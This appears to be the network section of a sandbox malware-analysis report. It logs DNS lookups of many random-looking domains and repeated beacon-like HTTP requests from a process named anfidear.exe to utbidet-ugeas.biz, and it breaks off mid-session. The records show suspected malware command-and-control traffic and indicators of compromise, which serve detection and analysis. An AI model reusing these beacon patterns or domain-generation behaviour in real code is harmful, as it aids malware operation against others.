                                                                                                                                                                    Sep 7, 2024 15:37:54.001894951 CEST1.1.1.1192.168.2.120x983bNo error (0)ohoeojo.ws64.70.19.203A (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:54.303370953 CEST1.1.1.1192.168.2.120x2c50Name error (3)mugzcii.krnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:54.303389072 CEST1.1.1.1192.168.2.120x2c50Name error (3)mugzcii.krnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:54.495127916 CEST1.1.1.1192.168.2.120x178Name error (3)ikyggiyllgxqx.tknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:54.872960091 CEST1.1.1.1192.168.2.120xc6d6Name error (3)fanlmeukiwq.rwnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:55.128019094 CEST1.1.1.1192.168.2.120x4e5eName error (3)uyqabxb.cmnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:55.183259010 CEST1.1.1.1192.168.2.120x7a6fName error (3)emqqxqx.stnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:55.316165924 CEST1.1.1.1192.168.2.120xa00fName error (3)gkhufm.mpnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:55.354604006 CEST1.1.1.1192.168.2.120x1a75Name error (3)iimgadwgyomnr.krnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:55.575136900 CEST1.1.1.1192.168.2.120xe815Name error (3)peizameowxy.cgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:55.802342892 CEST1.1.1.1192.168.2.120x17caNo error (0)mwohrwudors.ws64.70.19.203A (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:55.867389917 CEST1.1.1.1192.168.2.120x959eName error (3)argunoos.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:55.932298899 CEST1.1.1.1192.168.2.120xa8feName error (3)aechgzyxgy.cgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:56.108161926 CEST1.1.1.1192.168.2.120xd495Name error (3)dgaziikvb.tknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:56.393277884 CEST1.1.1.1192.168.2.120xcd8aName error (3)ekguekqspekhe.tknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:56.435609102 CEST1.1.1.1192.168.2.120x28c9No error (0)lfmhc.ws64.70.19.203A (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:56.827258110 CEST1.1.1.1192.168.2.120xead7Name error (3)fmgoswddhby.mpnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:56.827275038 CEST1.1.1.1192.168.2.120xead7Name error (3)fmgoswddhby.mpnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:57.331677914 CEST1.1.1.1192.168.2.120xf73aName error (3)qaoryggkcqkjc.rwnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:57.331696033 CEST1.1.1.1192.168.2.120xf73aName error (3)qaoryggkcqkjc.rwnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                    • utbidet-ugeas.biz
                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    0192.168.2.1249711172.234.222.138806212C:\Windows\SysWOW64\anfidear.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Sep 7, 2024 15:33:57.038599968 CEST161OUTGET /d/N?020C6411C80C6411C83E643DC80C6433941880DB5A0C6427E63E4A28FA3C543FC8 HTTP/1.0
                                                                                                                                                                    Host: utbidet-ugeas.biz
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                    Sep 7, 2024 15:33:57.525052071 CEST533INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                    Server: openresty
                                                                                                                                                                    Date: Sat, 07 Sep 2024 13:33:57 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 142
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                    Location: http://ww99.utbidet-ugeas.biz/d/N?020C6411C80C6411C83E643DC80C6433941880DB5A0C6427E63E4A28FA3C543FC8
                                                                                                                                                                    Cache-Control: no-store, max-age=0
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    1192.168.2.1249713172.234.222.138806212C:\Windows\SysWOW64\anfidear.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Sep 7, 2024 15:33:58.524586916 CEST161OUTGET /d/N?0235DD9B4D35DD9B4D07DDB74D35DDB911213951DF35DDAD6307F3A27F05EDB54D HTTP/1.0
                                                                                                                                                                    Host: utbidet-ugeas.biz
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                    Sep 7, 2024 15:33:59.015506029 CEST533INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                    Server: openresty
                                                                                                                                                                    Date: Sat, 07 Sep 2024 13:33:58 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 142
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                    Location: http://ww99.utbidet-ugeas.biz/d/N?0235DD9B4D35DD9B4D07DDB74D35DDB911213951DF35DDAD6307F3A27F05EDB54D
                                                                                                                                                                    Cache-Control: no-store, max-age=0
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    2192.168.2.1249715172.234.222.138806212C:\Windows\SysWOW64\anfidear.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Sep 7, 2024 15:33:59.790144920 CEST161OUTGET /d/N?025A8C4B0B5A8C4B0B688C670B5A8C69574E6881995A8C7D2568A272396ABC650B HTTP/1.0
                                                                                                                                                                    Host: utbidet-ugeas.biz
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                    Sep 7, 2024 15:34:00.285989046 CEST533INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                    Server: openresty
                                                                                                                                                                    Date: Sat, 07 Sep 2024 13:34:00 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 142
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                    Location: http://ww99.utbidet-ugeas.biz/d/N?025A8C4B0B5A8C4B0B688C670B5A8C69574E6881995A8C7D2568A272396ABC650B
                                                                                                                                                                    Cache-Control: no-store, max-age=0
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    3192.168.2.1249717172.234.222.138806212C:\Windows\SysWOW64\anfidear.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Sep 7, 2024 15:34:00.578800917 CEST161OUTGET /d/N?025BB1E5225BB1E52269B1C9225BB1C77E4F552FB05BB1D30C699FDC106B81CB22 HTTP/1.0
                                                                                                                                                                    Host: utbidet-ugeas.biz
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                    Sep 7, 2024 15:34:01.091180086 CEST533INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                    Server: openresty
                                                                                                                                                                    Date: Sat, 07 Sep 2024 13:34:01 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 142
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                    Location: http://ww99.utbidet-ugeas.biz/d/N?025BB1E5225BB1E52269B1C9225BB1C77E4F552FB05BB1D30C699FDC106B81CB22
                                                                                                                                                                    Cache-Control: no-store, max-age=0
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    4192.168.2.1249720172.234.222.138806212C:\Windows\SysWOW64\anfidear.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Sep 7, 2024 15:34:02.749423027 CEST161OUTGET /d/N?022CF4D3322CF4D3321EF4FF322CF4F16E381019A02CF4E51C1EDAEA001CC4FD32 HTTP/1.0
                                                                                                                                                                    Host: utbidet-ugeas.biz
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                    Sep 7, 2024 15:34:03.254664898 CEST533INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                    Server: openresty
                                                                                                                                                                    Date: Sat, 07 Sep 2024 13:34:03 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 142
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                    Location: http://ww99.utbidet-ugeas.biz/d/N?022CF4D3322CF4D3321EF4FF322CF4F16E381019A02CF4E51C1EDAEA001CC4FD32
                                                                                                                                                                    Cache-Control: no-store, max-age=0
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    5192.168.2.1249722172.234.222.138806212C:\Windows\SysWOW64\anfidear.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Sep 7, 2024 15:34:03.415193081 CEST161OUTGET /d/N?025A0E4F5F5A0E4F5F680E635F5A0E6D034EEA85CD5A0E79716820766D6A3E615F HTTP/1.0
                                                                                                                                                                    Host: utbidet-ugeas.biz
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                    Sep 7, 2024 15:34:03.889466047 CEST533INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                    Server: openresty
                                                                                                                                                                    Date: Sat, 07 Sep 2024 13:34:03 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 142
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                    Location: http://ww99.utbidet-ugeas.biz/d/N?025A0E4F5F5A0E4F5F680E635F5A0E6D034EEA85CD5A0E79716820766D6A3E615F
                                                                                                                                                                    Cache-Control: no-store, max-age=0
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    6192.168.2.1249724172.234.222.138806212C:\Windows\SysWOW64\anfidear.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Sep 7, 2024 15:34:04.645740986 CEST161OUTGET /d/N?0246F53AA146F53AA174F516A146F518FD5211F03346F50C8F74DB039376C514A1 HTTP/1.0
                                                                                                                                                                    Host: utbidet-ugeas.biz
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                    Sep 7, 2024 15:34:05.126940012 CEST533INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                    Server: openresty
                                                                                                                                                                    Date: Sat, 07 Sep 2024 13:34:05 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 142
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                    Location: http://ww99.utbidet-ugeas.biz/d/N?0246F53AA146F53AA174F516A146F518FD5211F03346F50C8F74DB039376C514A1
                                                                                                                                                                    Cache-Control: no-store, max-age=0
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    7192.168.2.1249726172.234.222.138806212C:\Windows\SysWOW64\anfidear.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Sep 7, 2024 15:34:07.096348047 CEST161OUTGET /d/N?02C22D9D4EC22D9D4EF02DB14EC22DBF12D6C957DCC22DAB60F003A47CF21DB34E HTTP/1.0
                                                                                                                                                                    Host: utbidet-ugeas.biz
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                    Sep 7, 2024 15:34:07.611227036 CEST533INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                    Server: openresty
                                                                                                                                                                    Date: Sat, 07 Sep 2024 13:34:07 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 142
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                    Location: http://ww99.utbidet-ugeas.biz/d/N?02C22D9D4EC22D9D4EF02DB14EC22DBF12D6C957DCC22DAB60F003A47CF21DB34E
                                                                                                                                                                    Cache-Control: no-store, max-age=0
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    8192.168.2.1249730172.234.222.138806212C:\Windows\SysWOW64\anfidear.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Sep 7, 2024 15:34:08.477678061 CEST161OUTGET /d/N?0298E2C40A98E2C40AAAE2E80A98E2E6568C060E9898E2F224AACCFD38A8D2EA0A HTTP/1.0
                                                                                                                                                                    Host: utbidet-ugeas.biz
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                    Sep 7, 2024 15:34:08.955478907 CEST533INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                    Server: openresty
                                                                                                                                                                    Date: Sat, 07 Sep 2024 13:34:08 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 142
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                    Location: http://ww99.utbidet-ugeas.biz/d/N?0298E2C40A98E2C40AAAE2E80A98E2E6568C060E9898E2F224AACCFD38A8D2EA0A
                                                                                                                                                                    Cache-Control: no-store, max-age=0
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    9192.168.2.1249734172.234.222.138806212C:\Windows\SysWOW64\anfidear.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Sep 7, 2024 15:34:10.027791023 CEST161OUTGET /d/N?02ACB76E12ACB76E129EB74212ACB74C4EB853A480ACB7583C9E9957209C874012 HTTP/1.0
                                                                                                                                                                    Host: utbidet-ugeas.biz
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                    Sep 7, 2024 15:34:10.513998032 CEST533INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                    Server: openresty
                                                                                                                                                                    Date: Sat, 07 Sep 2024 13:34:10 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 142
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                    Location: http://ww99.utbidet-ugeas.biz/d/N?02ACB76E12ACB76E129EB74212ACB74C4EB853A480ACB7583C9E9957209C874012
                                                                                                                                                                    Cache-Control: no-store, max-age=0
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    10192.168.2.1249737172.234.222.138806212C:\Windows\SysWOW64\anfidear.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Sep 7, 2024 15:34:10.851866961 CEST161OUTGET /d/N?02D09DF3BFD09DF3BFE29DDFBFD09DD1E3C479392DD09DC591E2B3CA8DE0ADDDBF HTTP/1.0
                                                                                                                                                                    Host: utbidet-ugeas.biz
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                    Sep 7, 2024 15:34:11.335961103 CEST533INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                    Server: openresty
                                                                                                                                                                    Date: Sat, 07 Sep 2024 13:34:11 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 142
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                    Location: http://ww99.utbidet-ugeas.biz/d/N?02D09DF3BFD09DF3BFE29DDFBFD09DD1E3C479392DD09DC591E2B3CA8DE0ADDDBF
                                                                                                                                                                    Cache-Control: no-store, max-age=0
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    11192.168.2.1249739172.234.222.138806212C:\Windows\SysWOW64\anfidear.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Sep 7, 2024 15:34:11.649821043 CEST161OUTGET /d/N?02F3E1611BF3E1611BC1E14D1BF3E14347E705AB89F3E15735C1CF5829C3D14F1B HTTP/1.0
                                                                                                                                                                    Host: utbidet-ugeas.biz
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                    Sep 7, 2024 15:34:12.231899023 CEST533INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                    Server: openresty
                                                                                                                                                                    Date: Sat, 07 Sep 2024 13:34:12 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 142
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                    Location: http://ww99.utbidet-ugeas.biz/d/N?02F3E1611BF3E1611BC1E14D1BF3E14347E705AB89F3E15735C1CF5829C3D14F1B
                                                                                                                                                                    Cache-Control: no-store, max-age=0
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    12192.168.2.1249741172.234.222.138806212C:\Windows\SysWOW64\anfidear.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
